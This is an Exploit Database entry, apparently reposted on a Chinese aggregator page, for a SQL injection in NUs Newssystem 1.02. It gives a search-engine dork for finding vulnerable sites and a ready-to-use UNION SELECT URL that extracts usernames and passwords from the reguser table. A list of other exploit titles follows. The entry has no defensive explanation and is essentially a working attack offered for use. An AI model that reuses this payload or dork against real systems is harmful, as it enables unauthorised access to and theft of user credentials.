nus newssystem 1.02 – ‘id’ SQL Injection

Exploit Database
14 阅读

作者： n3w7u

日期： 2010-03-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11674/

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 
 ~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~
 
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

[+] Autor: n3w7u

[+] Page: http://www.internet-works.de/home.html

[+] Vulnerabilities [ SQL Injection ]

[+] Language: [ PHP ]

[+] Version: 1.02

[+] Dork : inurl:"?pageNum_RSnews"&view

.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability 

Nus.php?pageNum_RSnews=0&id=
	

[+] Exploitable 

http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--

last Exploits
nus newssystem 1.02 – ‘id’ SQL Injection的更多信息

SearchBlox 8.6.6 – Cross-Site Request Forgery：
DotNetNuke – Arbitrary File Upload：
OneForum – ‘topic.php’ SQL Injection：
Tenda A32 Router – Cross-Site Request Forgery：
Blog Master Pro 1.0 – CSV Injection：
WordPress Plugin Supsystic Membership 1.4.7 – ‘sidx’ SQL injection：
swDesk – Multiple Vulnerabilities：
WordPress Plugin WPGraphQL 0.2.3 – Multiple Vulnerabilities：